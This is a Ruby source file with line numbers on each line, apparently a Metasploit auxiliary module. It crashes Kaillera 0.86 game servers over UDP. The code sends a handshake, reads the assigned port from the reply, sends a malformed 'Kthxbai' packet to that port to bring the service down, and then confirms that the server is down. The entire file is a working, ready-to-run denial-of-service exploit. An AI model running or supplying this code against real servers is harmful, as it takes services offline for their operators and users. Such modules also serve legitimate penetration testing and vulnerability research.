1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Kaillera 0.86 Server Denial of Service',
15
        'Description' => %q{
16
          The Kaillera 0.86 server can be shut down by sending any malformed packet
17
          after the initial "hello" packet.
18
        },
19
        'Author' => ['Sil3nt_Dre4m'],
20
        'License' => MSF_LICENSE,
21
        'DisclosureDate' => '2011-07-02',
22
        'References' => [
23
          [ 'CVE', '2011-10020' ]
24
        ],
25
        'Notes' => {
26
          'Stability' => [CRASH_SERVICE_DOWN],
27
          'SideEffects' => [],
28
          'Reliability' => []
29
        }
30
      )
31
    )
32

33
    register_options([
34
      Opt::RPORT(27888)
35
    ])
36
  end
37

38
  def run
39
    # Send HELLO to target
40
    connect_udp
41
    print_status('Sending Crash request...')
42
    udp_sock.put("HELLO0.83\0")
43
    res = udp_sock.recvfrom(15)
44
    disconnect_udp
45

46
    if res[0] =~ /HELLOD00D([0-9]{1,5})/
47
      port = ::Regexp.last_match(1)
48
    else
49
      print_error('Connection failed')
50
      return
51
    end
52

53
    # Send DOS packet
54
    connect_udp(true, 'RPORT' => port)
55
    print_status("Sending DoS packet to #{rhost}:#{port}...")
56
    udp_sock.put('Kthxbai')
57
    disconnect_udp
58

59
    # Check is target is down
60
    connect_udp
61
    print_status('Checking target...')
62
    udp_sock.put("HELLO0.83\0")
63
    res = udp_sock.recvfrom(15)
64
    disconnect_udp
65

66
    if res[0] =~ /HELLO/
67
      print_error('DoS attempt failed.  It appears target is still up.')
68
    else
69
      print_good('Target is down')
70
    end
71
  end
72
end
73

74